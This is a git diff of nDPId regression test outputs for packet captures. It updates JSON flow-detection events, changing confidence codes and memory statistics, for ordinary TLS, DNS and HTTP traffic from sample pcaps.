-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447249,"flow_last_seen":1604822447807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":268,"flow_first_seen":1604822444486,"flow_last_seen":1604822448523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":682,"flow_tot_l4_payload_len":17062,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.249.249","src_port":51606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":785,"flow_first_seen":1604822444913,"flow_last_seen":1604822448604,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":480607,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.16.124.96","src_port":51612,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447227,"flow_last_seen":1604822447785,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51635,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1604822447249,"flow_last_seen":1604822447807,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4696,"flow_avg_l4_payload_len":204,"midstream":0,"thread_ts_msec":1604822448604,"l3_proto":"ip4","src_ip":"192.168.1.119","dst_ip":"104.17.198.37","src_port":51636,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Cloudflare","breed":"Acceptable","category":"Web"}} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1185,"source":"no_sni.pcap","alias":"nDPId-test","packets-captured":1185,"packets-processed":1185,"total-skipped-flows":0,"total-l4-payload-len":523130,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":7,"total-updates":0,"current-active-flows":0,"total-active-flows":8,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":58,"global_ts_msec":1604822448604} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1185/1185 @@ -64,9 +64,9 @@ ~~ total active/idle flows...: 8/8 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5930148 bytes -~~ total memory freed........: 5930148 bytes -~~ total allocations/frees...: 119353/119353 +~~ total memory allocated....: 6063782 bytes +~~ total memory freed........: 6063782 bytes +~~ total allocations/frees...: 122115/122115 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 453 chars ~~ json string max len.......: 988 chars diff --git a/test/results/ocs.pcap.out b/test/results/ocs.pcap.out index f047c7273..97c20ba66 100644 --- a/test/results/ocs.pcap.out +++ b/test/results/ocs.pcap.out @@ -4,13 +4,13 @@ 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ocs.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1449652784341,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652784341,"pkt":"RQAAPKbzQABABiV4wKi0AkDpuLy6UxRsAv3YCQAAAACgAjkIdPYAAAIEBbQEAggKADWBtgAAAAABAwMG"} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652786071,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1449652786071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":63,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":63,"pkt_l4_len":43,"thread_ts_msec":1449652786071,"pkt":"RQAAP4JiQABAETORwKi0AggICAiWSAA1ACtxaqbPAQAAAQAAAAAAAAVvY3UwMwhsYWJnZW5jeQJ3cwAAAQAB"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652786071,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocu03.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"ocs.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786071,"flow_last_seen":1449652786071,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1449652786071,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":38472,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocu03.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652786098,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1449652786098,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":70,"pkt_l4_len":50,"thread_ts_msec":1449652786098,"pkt":"RQAARoJmQABAETOGwKi0AggICAicoQA1ADK8OQlbAQAAAQAAAAAAAAhzZXR0aW5ncwtjcmFzaGx5dGljcwNjb20AAAEAAQ=="} -00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652786098,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"dns": {"query":"settings.crashlytics.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"ocs.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786098,"flow_last_seen":1449652786098,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1449652786098,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":40097,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"dns": {"query":"settings.crashlytics.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652786130,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1449652786130,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":67,"pkt_l4_len":47,"thread_ts_msec":1449652786130,"pkt":"RQAAQ4JpQABAETOGwKi0AggICAgFCwA1AC+TFZykAQAAAQAAAAAAAANhcGkEZXUwMQhjYXBwdGFpbgNjb20AAAEAAQ=="} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652786130,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"api.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ocs.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786130,"flow_last_seen":1449652786130,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1449652786130,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":1291,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"api.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786135,"flow_last_seen":1449652786135,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786135,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1449652786135,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786135,"pkt":"RQAAPJwfQABABqbCwKi0ArL40Da8egBQwI4edgAAAACgAjkI+LAAAAIEBbQEAggKADWCaQAAAAABAwMG"} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786152,"flow_last_seen":1449652786152,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786152,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} @@ -19,93 +19,91 @@ 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1449652786167,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786167,"pkt":"RQAAPOubQABABs8fwKi0AomHgc7QbABQfGRp9gAAAACgAjkIVT4AAAIEBbQEAggKADWCbQAAAAABAwMG"} 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1449652786190,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786190,"pkt":"RQAANJwgQABABqbJwKi0ArL40Da8egBQwI4ed\/tL3mKAEADlQqoAAAEBCAoANYJvRwX8Kg=="} 01476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1449652786215,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":824,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":824,"pkt_l4_len":804,"thread_ts_msec":1449652786215,"pkt":"RQADOJwhQABABqPEwKi0ArL40Da8egBQwI4ed\/tL3mKAGADlWgkAAAEBCAoANYJxRwX8KlBPU1QgL2NhdGFsb2cvdm9kP3Y9MyBIVFRQLzEuMQ0KWC1MZ3ktSHNzLUE6IEZGRTg2OUEyLTMzQUQtQTU0QS1CRUMwLTcyMTBEMDNDODM1Qi0yNTk0RDYzRA0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpYLUxneS1IU1MtU2VydmljZS1JZDogb2ZyLm9jcw0KWC1MZ3ktSFNTLVJvbS1JZDogc2Ftc3VuZy9HVC1QNzUxMC9BbmRyb2lkLzQuMC40L1hXTFA2L2FybXY3bF8xMDAwLjBNSHpfMTk5OC44NEJvZ29NaXBzX2ZlYXR1cmVzKHN3cCxoYWxmLHRodW1iLGZhc3RtdWx0LHZmcCxlZHNwLHZmcHYzLHZmcHYzZDE2LHRscylfY29yZXM9Mi8xMjgweDc1Mi9mYWxzZQ0KQ29udGVudC1MZW5ndGg6IDIzNA0KSG9zdDogb2N1MDMubGFiZ2VuY3kud3MNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgVTsgQW5kcm9pZCA0LjAuNDsgZnItZnI7IEdULVA3NTEwIEJ1aWxkL0lNTTc2RCkgQXBwbGVXZWJLaXQvNTM0LjMwIChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgU2FmYXJpLzUzNC4zMA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJVVEYtOCI\/Pgo8bGd5cmVxdWVzdCBtb2R1bGU9IkNNL1ZPRCI+Cgk8YWN0aW9uIG5hbWU9ImluaXQiPgoJCTxwYXJhbSBuYW1lPSJzY3JlZW5TaXplIiB2YWx1ZT0iIi8+CgkJPHBhcmFtIG5hbWU9InRpbWVzdGFtcCIgdmFsdWU9IjAiLz4KCQk8cGFyYW0gbmFtZT0iYXBwLXZlcnNpb24iIHZhbHVlPSIxLjQuNyIvPgoJPC9hY3Rpb24+CjwvbGd5cmVxdWVzdD4="} -00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786135,"flow_last_seen":1449652786215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1449652786215,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; U; Android 4.0.4; fr-fr; GT-P7510 Build\/IMM76D) AppleWebKit\/534.30 (KHTML, like Gecko) Version\/4.0 Safari\/534.30"}} +00897{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"ocs.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786135,"flow_last_seen":1449652786215,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":772,"flow_tot_l4_payload_len":772,"flow_avg_l4_payload_len":257,"midstream":0,"thread_ts_msec":1449652786215,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":48250,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; U; Android 4.0.4; fr-fr; GT-P7510 Build\/IMM76D) AppleWebKit\/534.30 (KHTML, like Gecko) Version\/4.0 Safari\/534.30"}} 00444{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1449652786268,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786268,"pkt":"RQAANOucQABABs8mwKi0AomHgc7QbABQfGRp97oFwGaAEADlOEAAAAEBCAoANYJ3vXlL7A=="} 00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1449652786271,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":211,"pkt_l4_len":191,"thread_ts_msec":1449652786271,"pkt":"RQAA0+udQABABs6GwKi0AomHgc7QbABQfGRp97oFwGaAGADl3TMAAAEBCAoANYJ3vXlL7EdFVCAveG1wcC1kaXNjbz9kZXZpY2VpZD1mMmM5OTNkNjIxOGY1ZTIyZmUyODRiMmU5MGM4MmYzYiZwdXNoX29uX2RldmljZT10cnVlJmFwcGlkPW9jczAwMDAwMyBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786167,"flow_last_seen":1449652786271,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1449652786271,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/xmpp-disco?deviceid=f2c993d6218f5e22fe284b2e90c82f3b&push_on_device=true&appid=ocs000003","code":0,"content_type":"","user_agent":""}} +00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"ocs.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786167,"flow_last_seen":1449652786271,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1449652786271,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":53356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/xmpp-disco?deviceid=f2c993d6218f5e22fe284b2e90c82f3b&push_on_device=true&appid=ocs000003","code":0,"content_type":"","user_agent":""}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786395,"flow_last_seen":1449652786395,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652786395,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1449652786395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786395,"pkt":"RQAAPGAaQABABlqhwKi0AomHgc6vnwBQfAzimQAAAACgAjkI\/akAAAIEBbQEAggKADWCgwAAAAABAwMG"} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1449652786500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786500,"pkt":"RQAANGAbQABABlqowKi0AomHgc6vnwBQfAzimh3f\/xqAEADlPeYAAAEBCAoANYKOvXlMIw=="} 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1449652786501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":136,"pkt_l4_len":116,"thread_ts_msec":1449652786501,"pkt":"RQAAiGAcQABABlpTwKi0AomHgc6vnwBQfAzimh3f\/xqAGADlKR0AAAEBCAoANYKOvXlMI0dFVCAvaXAtdG8tY291bnRyeSBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786395,"flow_last_seen":1449652786501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652786501,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/ip-to-country","code":0,"content_type":"","user_agent":""}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786395,"flow_last_seen":1449652786501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652786501,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/ip-to-country","code":0,"content_type":"","user_agent":""}} 